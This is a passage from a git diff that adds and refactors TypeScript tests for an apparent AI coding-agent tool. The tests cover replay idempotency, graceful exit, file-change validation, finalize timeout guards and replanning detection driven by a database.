+    const task = getTask(MID, SID, TID);
+    assert.ok(task !== null, "task should exist after status update");
+    assert.equal(task!.status, "done", "status should be 'done' after double replay");
+  });
+
+  test("updateTaskStatus is idempotent for start_task replay", () => {
+    // Simulates replaying a start_task event twice
+    updateTaskStatus(MID, SID, TID, "in-progress");
+    updateTaskStatus(MID, SID, TID, "in-progress");
+
+    const task = getTask(MID, SID, TID);
+    assert.ok(task !== null, "task should exist after status update");
+    assert.equal(task!.status, "in-progress", "status should be 'in-progress' after double replay");
+  });
+
+  test("updateTaskStatus for report_blocker does not set blocker_discovered flag (M4)", () => {
+    // M4 finding: report_blocker replay only calls updateTaskStatus("blocked").
+    // The blocker_discovered column is NOT set during replay — this is a known
+    // lossy replay: status is recovered but the blocker flag is not.
+    updateTaskStatus(MID, SID, TID, "blocked");
+
+    const task = getTask(MID, SID, TID);
+    assert.ok(task !== null, "task should exist after blocked status update");
+    assert.equal(task!.status, "blocked", "status should be 'blocked'");
+    assert.equal(
+      task!.blocker_discovered,
+      false,
+      "blocker_discovered should remain false — report_blocker replay is lossy (M4 finding)",
+    );
+  });
+
+  test("insertVerificationEvidence is NOT idempotent — duplicates accumulate (M5)", () => {
+    // M5 finding: insertVerificationEvidence uses a plain INSERT (no ON CONFLICT),
+    // so replaying the same record_verification event twice produces two rows.
+    // Both calls must succeed without throwing — the duplication is the risk.
+    const evidence = {
+      taskId: TID,
+      sliceId: SID,
+      milestoneId: MID,
+      command: "npm test",
+      exitCode: 0,
+      verdict: "pass",
+      durationMs: 1200,
+    };
+
+    assert.doesNotThrow(
+      () => insertVerificationEvidence(evidence),
+      "first insertVerificationEvidence call should not throw",
+    );
+    assert.doesNotThrow(
+      () => insertVerificationEvidence(evidence),
+      "second insertVerificationEvidence call should not throw — duplicates accumulate silently (M5 finding)",
+    );
+  });
+
+  test("upsertDecision is idempotent via INSERT OR REPLACE", () => {
+    // save_decision replay uses upsertDecision which is INSERT OR REPLACE,
+    // so replaying the same decision id twice overwrites without error.
+    const base = {
+      id: "arch:logging",
+      when_context: "during planning",
+      scope: "arch",
+      decision: "logging",
+      rationale: "structured logs",
+      revisable: "yes" as const,
+      made_by: "agent" as const,
+      superseded_by: null,
+    };
+
+    upsertDecision({ ...base, choice: "structured" });
+    upsertDecision({ ...base, choice: "unstructured" });
+
+    // No error means the second call replaced the first — idempotent at the id level.
+    // The final choice is "unstructured" per INSERT OR REPLACE semantics.
+  });
+
+  test("unknown event commands in replayEvents are silently skipped — extractEntityKey returns null for unknown commands", () => {
+    // replayEvents uses a switch/default that silently skips unrecognised commands.
+    // We verify this via extractEntityKey which follows the same command set.
+    // A future_command not in the switch must return null (not throw).
+    const event = {
+      cmd: "future_command",
+      params: { foo: "bar" },
+      ts: new Date().toISOString(),
+      hash: "0000000000000000",
+      actor: "agent" as const,
+      session_id: "test-session",
+    };
+
+    const key = extractEntityKey(event);
+    assert.equal(key, null, "extractEntityKey should return null for unknown commands");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/exit-command.test.ts b/src/resources/extensions/gsd/tests/exit-command.test.ts
index 4f1eaed12..25a934250 100644
--- a/src/resources/extensions/gsd/tests/exit-command.test.ts
+++ b/src/resources/extensions/gsd/tests/exit-command.test.ts
@@ -3,7 +3,7 @@ import assert from "node:assert/strict";
 
 import { registerExitCommand } from "../exit-command.ts";
 
-test("/exit requests graceful shutdown instead of process.exit", async () => {
+test("/exit requests graceful shutdown instead of process.exit", async (t) => {
   const commands = new Map<
     string,
     {
@@ -35,15 +35,13 @@ test("/exit requests graceful shutdown instead of process.exit", async () => {
     throw new Error(`process.exit should not be called: ${code ?? "undefined"}`);
   }) as typeof process.exit;
 
-  try {
-    await exit.handler("", {
-      async shutdown() {
-        shutdownCalls += 1;
-      },
-    });
-  } finally {
-    process.exit = originalExit;
-  }
+  t.after(() => { process.exit = originalExit; });
+
+  await exit.handler("", {
+    async shutdown() {
+      shutdownCalls += 1;
+    },
+  });
 
   assert.equal(stopAutoCalls, 1, "handler should stop auto-mode exactly once before shutdown");
   assert.equal(shutdownCalls, 1, "handler should request graceful shutdown exactly once");
@@ -51,7 +49,7 @@ test("/exit requests graceful shutdown instead of process.exit", async () => {
 
 // ─── #1839 regression: ESM cache mismatch must not crash exit ────────────────
 
-test("/exit still shuts down gracefully when stopAuto throws (ESM module cache mismatch)", async () => {
+test("/exit still shuts down gracefully when stopAuto throws (ESM module cache mismatch)", async (t) => {
   const commands = new Map<string, { description?: string; handler: (args: string, ctx: any) => Promise<void> }>();
 
   const pi = {
@@ -80,20 +78,18 @@ test("/exit still shuts down gracefully when stopAuto throws (ESM module cache m
     throw new Error(`process.exit should not be called: ${code ?? "undefined"}`);
   }) as typeof process.exit;
 
-  try {
-    await exit.handler("", {
-      async shutdown() {
-        shutdownCalls += 1;
+  t.after(() => { process.exit = originalExit; });
+
+  await exit.handler("", {
+    async shutdown() {
+      shutdownCalls += 1;
+    },
+    ui: {
+      notify(msg: string, level: string) {
+        notifications.push({ msg, level });
       },
-      ui: {
-        notify(msg: string, level: string) {
-          notifications.push({ msg, level });
-        },
-      },
-    });
-  } finally {
-    process.exit = originalExit;
-  }
+    },
+  });
 
   assert.equal(shutdownCalls, 1, "shutdown must still be called even when stopAuto throws");
   assert.equal(notifications.length, 1, "should emit exactly one warning notification");
diff --git a/src/resources/extensions/gsd/tests/file-change-validator.test.ts b/src/resources/extensions/gsd/tests/file-change-validator.test.ts
new file mode 100644
index 000000000..3e5df159b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/file-change-validator.test.ts
@@ -0,0 +1,50 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { execFileSync } from "node:child_process";
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
+import { tmpdir } from "node:os";
+import { join } from "node:path";
+
+import { validateFileChanges } from "../safety/file-change-validator.ts";
+
+function git(cwd: string, ...args: string[]): string {
+  return execFileSync("git", args, {
+    cwd,
+    stdio: ["ignore", "pipe", "pipe"],
+    encoding: "utf-8",
+  }).trim();
+}
+
+test("validateFileChanges ignores inline descriptions in expected output paths", (t) => {
+  const base = mkdtempSync(join(tmpdir(), "gsd-file-change-validator-"));
+  t.after(() => rmSync(base, { recursive: true, force: true }));
+
+  mkdirSync(join(base, "definitions"), { recursive: true });
+  git(base, "init");
+  git(base, "config", "user.email", "test@example.com");
+  git(base, "config", "user.name", "Test User");
+
+  const target = join(base, "definitions", "ac-audit.md");
+  writeFileSync(target, "initial\n");
+  git(base, "add", ".");
+  git(base, "commit", "-m", "initial");
+
+  writeFileSync(target, "updated\n");
+  git(base, "add", ".");
+  git(base, "commit", "-m", "update");
+
+  const audit = validateFileChanges(
+    base,
+    ["definitions/ac-audit.md — current state of AC CRM, tags, pipelines, automations"],
+    [],
+  );
+
+  assert.ok(audit, "audit should be produced when expected output exists");
+  assert.deepEqual(audit.unexpectedFiles, []);
+  assert.deepEqual(audit.missingFiles, []);
+  assert.equal(
+    audit.violations.some((v) => v.severity === "warning"),
+    false,
+    "described expected output should not trigger unexpected-file warnings",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/files-loadfile-eisdir.test.ts b/src/resources/extensions/gsd/tests/files-loadfile-eisdir.test.ts
index cff1d4876..c0bc25d19 100644
--- a/src/resources/extensions/gsd/tests/files-loadfile-eisdir.test.ts
+++ b/src/resources/extensions/gsd/tests/files-loadfile-eisdir.test.ts
@@ -6,15 +6,13 @@ import fs from "node:fs";
 
 import { loadFile } from "../files.ts";
 
-test("loadFile returns null for directory paths instead of throwing EISDIR", async () => {
+test("loadFile returns null for directory paths instead of throwing EISDIR", async (t) => {
   const tmp = fs.mkdtempSync(path.join(os.tmpdir(), "gsd-loadfile-eisdir-"));
   const dirPath = path.join(tmp, "tasks");
   fs.mkdirSync(dirPath);
 
-  try {
-    const result = await loadFile(dirPath);
-    assert.equal(result, null);
-  } finally {
-    fs.rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => { fs.rmSync(tmp, { recursive: true, force: true }); });
+
+  const result = await loadFile(dirPath);
+  assert.equal(result, null);
 });
diff --git a/src/resources/extensions/gsd/tests/finalize-timeout-guard.test.ts b/src/resources/extensions/gsd/tests/finalize-timeout-guard.test.ts
new file mode 100644
index 000000000..d4eae33c1
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/finalize-timeout-guard.test.ts
@@ -0,0 +1,241 @@
+/**
+ * Regression test for #2344: Auto-loop hangs after plan-slice completes
+ * because postUnitPostVerification() never resolves.
+ *
+ * When postUnitPostVerification() hangs (e.g., due to a module import
+ * deadlock or SQLite transaction hang), the auto-loop blocks forever
+ * with no error message, no notification, and no recovery.
+ *
+ * The fix adds a timeout guard around postUnitPostVerification() in
+ * runFinalize(). If it doesn't resolve within the timeout, the function
+ * force-returns "continue" and logs an error, allowing the loop to
+ * proceed to the next iteration.
+ *
+ * This test verifies the timeout utility used by the fix, since the
+ * full runFinalize function has too many transitive dependencies for
+ * isolated unit testing.
+ */
+
+import { createTestContext } from "./test-helpers.ts";
+import {
+  withTimeout,
+  FINALIZE_PRE_TIMEOUT_MS,
+  FINALIZE_POST_TIMEOUT_MS,
+} from "../auto/finalize-timeout.ts";
+import { MAX_FINALIZE_TIMEOUTS } from "../auto/types.ts";
+
+const { assertTrue, assertEq, report } = createTestContext();
+
+// ═══ Test: withTimeout resolves when inner promise resolves promptly ══════════
+
+{
+  console.log("\n=== #2344: withTimeout passes through when promise resolves ===");
+
+  const result = await withTimeout(
+    Promise.resolve("ok"),
+    1000,
+    "test-timeout",
+  );
+  assertEq(result.value, "ok", "should return inner value");
+  assertEq(result.timedOut, false, "should not be timed out");
+}
+
+// ═══ Test: withTimeout returns fallback when inner promise hangs ══════════════
+
+{
+  console.log("\n=== #2344: withTimeout returns fallback on hang ===");
+
+  const startTime = Date.now();
+  const result = await withTimeout(
+    new Promise<string>(() => {
+      // Never resolves
+    }),
+    100, // short timeout for testing
+    "test-timeout",
+  );
+  const elapsed = Date.now() - startTime;
+
+  assertEq(result.timedOut, true, "should report timeout");
+  assertEq(result.value, undefined, "value should be undefined on timeout");
+  assertTrue(elapsed >= 90, `should wait at least 90ms (took ${elapsed}ms)`);
+  assertTrue(elapsed < 500, `should not wait too long (took ${elapsed}ms)`);
+}
+
+// ═══ Test: withTimeout handles rejection gracefully ═══════════════════════════
+
+{
+  console.log("\n=== #2344: withTimeout propagates rejection ===");
+
+  let caught = false;
+  try {
+    await withTimeout(
+      Promise.reject(new Error("boom")),
+      1000,
+      "test-timeout",
+    );
+  } catch (err: any) {
+    caught = true;
+    assertEq(err.message, "boom", "should propagate the error");
+  }
+  assertTrue(caught, "rejection should propagate");
+}
+
+// ═══ Test: FINALIZE_PRE_TIMEOUT_MS is defined and reasonable ═════════════════
+
+{
+  console.log("\n=== #3757: pre-verification timeout constant is defined and reasonable ===");
+
+  assertTrue(
+    typeof FINALIZE_PRE_TIMEOUT_MS === "number",
+    "FINALIZE_PRE_TIMEOUT_MS should be a number",
+  );
+  assertTrue(
+    FINALIZE_PRE_TIMEOUT_MS >= 30_000,
+    `pre timeout should be >= 30s (got ${FINALIZE_PRE_TIMEOUT_MS}ms)`,
+  );
+  assertTrue(
+    FINALIZE_PRE_TIMEOUT_MS <= 120_000,
+    `pre timeout should be <= 120s (got ${FINALIZE_PRE_TIMEOUT_MS}ms)`,
+  );
+}
+
+// ═══ Test: FINALIZE_POST_TIMEOUT_MS is defined and reasonable ═════════════════
+
+{
+  console.log("\n=== #2344: timeout constant is defined and reasonable ===");
+
+  assertTrue(
+    typeof FINALIZE_POST_TIMEOUT_MS === "number",
+    "FINALIZE_POST_TIMEOUT_MS should be a number",
+  );
+  assertTrue(
+    FINALIZE_POST_TIMEOUT_MS >= 30_000,
+    `timeout should be >= 30s (got ${FINALIZE_POST_TIMEOUT_MS}ms)`,
+  );
+  assertTrue(
+    FINALIZE_POST_TIMEOUT_MS <= 120_000,
+    `timeout should be <= 120s (got ${FINALIZE_POST_TIMEOUT_MS}ms)`,
+  );
+}
+
+// ═══ Test: withTimeout cleans up timer on success ════════════════════════════
+
+{
+  console.log("\n=== #2344: withTimeout cleans up timer on success ===");
+
+  // If the timer isn't cleaned up, this test would keep the process alive.
+  // Relying on process.exit behavior — if test completes, timers were cleaned.
+  const result = await withTimeout(
+    new Promise<string>((r) => setTimeout(() => r("delayed"), 50)),
+    5000,
+    "cleanup-test",
+  );
+  assertEq(result.value, "delayed", "should resolve with delayed value");
+  assertEq(result.timedOut, false, "should not time out");
+}
+
+// ═══ Test: runFinalize wraps BOTH pre and post verification with withTimeout ═
+
+{
+  console.log("\n=== #3757: runFinalize wraps preVerification with timeout guard ===");
+
+  const { readFileSync } = await import("node:fs");
+  const phasesSource = readFileSync(
+    new URL("../auto/phases.ts", import.meta.url),
+    "utf-8",
+  );
+
+  // Find the runFinalize function body
+  const fnIdx = phasesSource.indexOf("export async function runFinalize(");
+  assertTrue(fnIdx > 0, "runFinalize function should exist in phases.ts");
+
+  const fnBody = phasesSource.slice(fnIdx, fnIdx + 8000);
+
+  // postUnitPreVerification must be wrapped in withTimeout
+  const preTimeoutIdx = fnBody.indexOf("withTimeout(");
+  assertTrue(preTimeoutIdx > 0, "withTimeout should appear in runFinalize");
+
+  const preVerIdx = fnBody.indexOf("postUnitPreVerification");
+  assertTrue(preVerIdx > 0, "postUnitPreVerification should appear in runFinalize");
+
+  // The first withTimeout should wrap postUnitPreVerification (not postUnitPostVerification)
+  const firstWithTimeout = fnBody.slice(preTimeoutIdx, preTimeoutIdx + 200);
+  assertTrue(
+    firstWithTimeout.includes("postUnitPreVerification"),
+    "first withTimeout in runFinalize should wrap postUnitPreVerification",
+  );
+
+  // postUnitPostVerification must also be wrapped
+  const postVerIdx = fnBody.indexOf("postUnitPostVerification");
+  assertTrue(postVerIdx > 0, "postUnitPostVerification should appear in runFinalize");
+
+  // Count withTimeout occurrences — should be at least 2 (pre + post)
+  const timeoutCount = (fnBody.match(/withTimeout\(/g) || []).length;
+  assertTrue(
+    timeoutCount >= 2,
+    `runFinalize should have at least 2 withTimeout guards (found ${timeoutCount})`,
+  );
+}
+
+// ═══ Test: MAX_FINALIZE_TIMEOUTS is defined and reasonable ═══════════════════
+
+{
+  console.log("\n=== #3757: MAX_FINALIZE_TIMEOUTS is defined and reasonable ===");
+
+  assertTrue(
+    typeof MAX_FINALIZE_TIMEOUTS === "number",
+    "MAX_FINALIZE_TIMEOUTS should be a number",
+  );
+  assertTrue(
+    MAX_FINALIZE_TIMEOUTS >= 2,
+    `threshold should be >= 2 (got ${MAX_FINALIZE_TIMEOUTS})`,
+  );
+  assertTrue(
+    MAX_FINALIZE_TIMEOUTS <= 10,
+    `threshold should be <= 10 (got ${MAX_FINALIZE_TIMEOUTS})`,
+  );
+}
+
+// ═══ Test: timeout handlers escalate after consecutive timeouts ══════════════
+
+{
+  console.log("\n=== #3757: timeout handlers escalate and detach currentUnit ===");
+
+  const { readFileSync } = await import("node:fs");
+  const phasesSource = readFileSync(
+    new URL("../auto/phases.ts", import.meta.url),
+    "utf-8",
+  );
+
+  const fnIdx = phasesSource.indexOf("export async function runFinalize(");
+  const fnBody = phasesSource.slice(fnIdx, fnIdx + 8000);
+
+  // Both timeout handlers should increment consecutiveFinalizeTimeouts
+  const incrementCount = (fnBody.match(/consecutiveFinalizeTimeouts\+\+/g) || []).length;
+  assertTrue(
+    incrementCount >= 2,
+    `should increment consecutiveFinalizeTimeouts in both pre and post handlers (found ${incrementCount})`,
+  );
+
+  // Both timeout handlers should check MAX_FINALIZE_TIMEOUTS for escalation
+  const escalationCount = (fnBody.match(/MAX_FINALIZE_TIMEOUTS/g) || []).length;
+  assertTrue(
+    escalationCount >= 2,
+    `should check MAX_FINALIZE_TIMEOUTS in both handlers (found ${escalationCount})`,
+  );
+
+  // Both timeout handlers should null out s.currentUnit to prevent late mutations
+  const detachCount = (fnBody.match(/s\.currentUnit\s*=\s*null/g) || []).length;
+  assertTrue(
+    detachCount >= 2,
+    `should detach s.currentUnit in both timeout handlers (found ${detachCount})`,
+  );
+
+  // Successful finalize should reset the counter
+  assertTrue(
+    fnBody.includes("consecutiveFinalizeTimeouts = 0"),
+    "should reset consecutiveFinalizeTimeouts on successful finalize",
+  );
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/find-missing-summaries-closed.test.ts b/src/resources/extensions/gsd/tests/find-missing-summaries-closed.test.ts
new file mode 100644
index 000000000..a0d0d70b0
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/find-missing-summaries-closed.test.ts
@@ -0,0 +1,48 @@
+/**
+ * Regression test for #3669 — findMissingSummaries skips closed slices
+ *
+ * When a slice has status "skipped", "complete", or "done", it should be
+ * excluded from the missing-summary check because closed slices intentionally
+ * lack SUMMARY files (or their DB status is authoritative).
+ *
+ * This is a structural verification test — it reads the source to confirm the
+ * CLOSED_STATUSES guard exists at the filter site.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'auto-dispatch.ts'), 'utf-8');
+
+describe('findMissingSummaries closed-status exclusion (#3669)', () => {
+  test('CLOSED_STATUSES set includes skipped, complete, and done', () => {
+    // The source must define a CLOSED_STATUSES set with all three statuses
+    assert.match(source, /CLOSED_STATUSES.*=.*new Set\(/,
+      'CLOSED_STATUSES set should be defined');
+    assert.match(source, /"skipped"/, 'CLOSED_STATUSES should include "skipped"');
+    assert.match(source, /"complete"/, 'CLOSED_STATUSES should include "complete"');
+    assert.match(source, /"done"/, 'CLOSED_STATUSES should include "done"');
+  });
+
+  test('filter uses CLOSED_STATUSES.has() to exclude closed slices', () => {
+    assert.match(source, /CLOSED_STATUSES\.has\(s\.status\)/,
+      'filter should call CLOSED_STATUSES.has(s.status)');
+  });
+
+  test('findMissingSummaries function exists', () => {
+    assert.match(source, /function findMissingSummaries\(/,
+      'findMissingSummaries function should be defined');
+  });
+
+  test('filter is negated (excludes closed, keeps open)', () => {
+    // The filter should use !CLOSED_STATUSES.has() to exclude closed slices
+    assert.match(source, /!CLOSED_STATUSES\.has\(s\.status\)/,
+      'filter should negate CLOSED_STATUSES.has() to exclude closed slices');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/flag-file-db.test.ts b/src/resources/extensions/gsd/tests/flag-file-db.test.ts
new file mode 100644
index 000000000..3c68f6527
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/flag-file-db.test.ts
@@ -0,0 +1,278 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+/**
+ * flag-file-db.test.ts — Verify that REPLAN.md and REPLAN-TRIGGER.md
+ * flag-file detection in deriveStateFromDb() works from DB-only data
+ * (no disk flag files needed when DB is seeded).
+ *
+ * Semantics:
+ *   - blocker_discovered on a completed task → replanning-slice (unless loop-protected)
+ *   - replan_triggered_at column on slice → replanning-slice (unless loop-protected)
+ *   - Loop protection: replan_history entries for the slice → skip replanning
+ */
+
+import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+
+import { deriveStateFromDb, invalidateStateCache } from '../state.ts';
+import {
+  openDatabase,
+  closeDatabase,
+  isDbAvailable,
+  insertMilestone,
+  insertSlice,
+  insertTask,
+  insertReplanHistory,
+  _getAdapter,
+} from '../gsd-db.ts';
+// ─── Fixture Helpers ───────────────────────────────────────────────────────
+
+function createFixtureBase(): string {
+  const base = mkdtempSync(join(tmpdir(), 'gsd-flag-file-db-'));
+  mkdirSync(join(base, '.gsd', 'milestones'), { recursive: true });
+  return base;
+}
+
+function writeFile(base: string, relativePath: string, content: string): void {
+  const full = join(base, '.gsd', relativePath);
+  mkdirSync(join(full, '..'), { recursive: true });
+  writeFileSync(full, content);
+}
+
+function cleanup(base: string): void {
+  rmSync(base, { recursive: true, force: true });
+}
+
+const ROADMAP_CONTENT = `# M001: Flag-File DB Test
+
+**Vision:** Test flag-file detection via DB.
+
+## Slices
+
+- [ ] **S01: Test Slice** \`risk:low\` \`depends:[]\`
+  > After this: done.
+`;
+
+const PLAN_CONTENT = `# S01: Test Slice
+
+**Goal:** Test replanning detection.
+**Demo:** Tests pass.
+
+## Tasks
+
+- [x] **T01: Done Task** \`est:10m\`
+  Already done.
+
+- [ ] **T02: Active Task** \`est:10m\`
+  Current task.
+`;
+
+// Minimal task plan file content — deriveStateFromDb checks the tasks dir has .md files
+const TASK_PLAN_STUB = `# T02: Active Task\n\nDo stuff.\n`;
+const TASK_SUMMARY_STUB = `---\nblocker_discovered: false\n---\n# T01 Summary\nDone.\n`;
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Tests
+// ═══════════════════════════════════════════════════════════════════════════
+
+describe('flag-file-db', async () => {
+
+  // ─── Test 1: blocker_discovered + no replan_history → replanning-slice ──
+  test('flag-file-db: blocker + no history → replanning', async () => {
+    const base = createFixtureBase();
+    try {
+      // Write disk files needed by deriveStateFromDb (roadmap check, task dir check)
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-PLAN.md', TASK_PLAN_STUB);
+
+      openDatabase(':memory:');
+      assert.ok(isDbAvailable(), 'test1: DB is available');
+
+      insertMilestone({ id: 'M001', title: 'Flag-File DB Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete', blockerDiscovered: true });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Active Task', status: 'pending' });
+
+      // No replan_history entries, no disk REPLAN.md — should trigger replanning
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(state.phase, 'replanning-slice', 'test1: phase is replanning-slice');
+      assert.ok(state.blockers.length > 0, 'test1: has blockers');
+      assert.ok(state.blockers[0]?.includes('blocker'), 'test1: blocker message mentions blocker');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 2: blocker_discovered + replan_history exists → loop protection → executing ──
+  test('flag-file-db: blocker + history → loop protection', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-PLAN.md', TASK_PLAN_STUB);
+
+      openDatabase(':memory:');
+
+      insertMilestone({ id: 'M001', title: 'Flag-File DB Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete', blockerDiscovered: true });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Active Task', status: 'pending' });
+
+      // Insert replan_history entry — loop protection should kick in
+      insertReplanHistory({
+        milestoneId: 'M001',
+        sliceId: 'S01',
+        summary: 'Replan already completed for this slice',
+      });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(state.phase, 'executing', 'test2: phase is executing (loop protection)');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 3: replan_triggered_at set + no replan_history → replanning-slice ──
+  test('flag-file-db: trigger column + no history → replanning', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-PLAN.md', TASK_PLAN_STUB);
+
+      openDatabase(':memory:');
+
+      insertMilestone({ id: 'M001', title: 'Flag-File DB Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Active Task', status: 'pending' });
+
+      // Set replan_triggered_at directly via SQL (simulating triage-resolution.ts writing it)
+      const adapter = _getAdapter();
+      adapter!.prepare(
+        "UPDATE slices SET replan_triggered_at = :ts WHERE milestone_id = :mid AND id = :sid",
+      ).run({ ":ts": new Date().toISOString(), ":mid": "M001", ":sid": "S01" });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(state.phase, 'replanning-slice', 'test3: phase is replanning-slice');
+      assert.ok(state.blockers.length > 0, 'test3: has blockers');
+      assert.ok(state.blockers[0]?.includes('Triage replan trigger'), 'test3: blocker message mentions triage trigger');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 4: replan_triggered_at set + replan_history exists → loop protection ──
+  test('flag-file-db: trigger column + history → loop protection', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-PLAN.md', TASK_PLAN_STUB);
+
+      openDatabase(':memory:');
+
+      insertMilestone({ id: 'M001', title: 'Flag-File DB Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Active Task', status: 'pending' });
+
+      // Set trigger column
+      const adapter = _getAdapter();
+      adapter!.prepare(
+        "UPDATE slices SET replan_triggered_at = :ts WHERE milestone_id = :mid AND id = :sid",
+      ).run({ ":ts": new Date().toISOString(), ":mid": "M001", ":sid": "S01" });
+
+      // Also add replan_history — loop protection should prevent replanning
+      insertReplanHistory({
+        milestoneId: 'M001',
+        sliceId: 'S01',
+        summary: 'Replan already done',
+      });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(state.phase, 'executing', 'test4: phase is executing (loop protection)');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 5: no blocker, no trigger → phase is executing ──────────────
+  test('flag-file-db: no blocker, no trigger → executing', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-ROADMAP.md', ROADMAP_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/S01-PLAN.md', PLAN_CONTENT);
+      writeFile(base, 'milestones/M001/slices/S01/tasks/T02-PLAN.md', TASK_PLAN_STUB);
+
+      openDatabase(':memory:');
+
+      insertMilestone({ id: 'M001', title: 'Flag-File DB Test', status: 'active' });
+      insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test Slice', status: 'active', risk: 'low', depends: [] });
+      insertTask({ id: 'T01', sliceId: 'S01', milestoneId: 'M001', title: 'Done Task', status: 'complete' });
+      insertTask({ id: 'T02', sliceId: 'S01', milestoneId: 'M001', title: 'Active Task', status: 'pending' });
+
+      // No blocker, no trigger, no replan_history — normal executing
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(state.phase, 'executing', 'test5: phase is executing');
+      assert.deepStrictEqual(state.activeTask?.id, 'T02', 'test5: activeTask is T02');
+      assert.deepStrictEqual(state.blockers.length, 0, 'test5: no blockers');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Diagnostic test: DB column inspection ──────────────────────────
+  test('flag-file-db: replan_triggered_at column is queryable', () => {
+    openDatabase(':memory:');
+
+    insertMilestone({ id: 'M001', title: 'Diagnostic', status: 'active' });
+    insertSlice({ id: 'S01', milestoneId: 'M001', title: 'Test', status: 'active', risk: 'low', depends: [] });
+
+    // Initially null
+    const adapter = _getAdapter();
+    const before = adapter!.prepare(
+      "SELECT id, replan_triggered_at FROM slices WHERE milestone_id = :mid",
+    ).get({ ":mid": "M001" }) as Record<string, unknown>;
+    assert.deepStrictEqual(before["replan_triggered_at"], null, 'diagnostic: replan_triggered_at initially null');
+
+    // After setting
+    adapter!.prepare(
+      "UPDATE slices SET replan_triggered_at = :ts WHERE milestone_id = :mid AND id = :sid",
+    ).run({ ":ts": "2025-01-01T00:00:00Z", ":mid": "M001", ":sid": "S01" });
+
+    const after = adapter!.prepare(
+      "SELECT id, replan_triggered_at FROM slices WHERE milestone_id = :mid",
+    ).get({ ":mid": "M001" }) as Record<string, unknown>;
+    assert.deepStrictEqual(after["replan_triggered_at"], "2025-01-01T00:00:00Z", 'diagnostic: replan_triggered_at is set');
+
+    closeDatabase();
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/flat-rate-routing-guard.test.ts b/src/resources/extensions/gsd/tests/flat-rate-routing-guard.test.ts
new file mode 100644
index 000000000..64a93608f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/flat-rate-routing-guard.test.ts
@@ -0,0 +1,50 @@
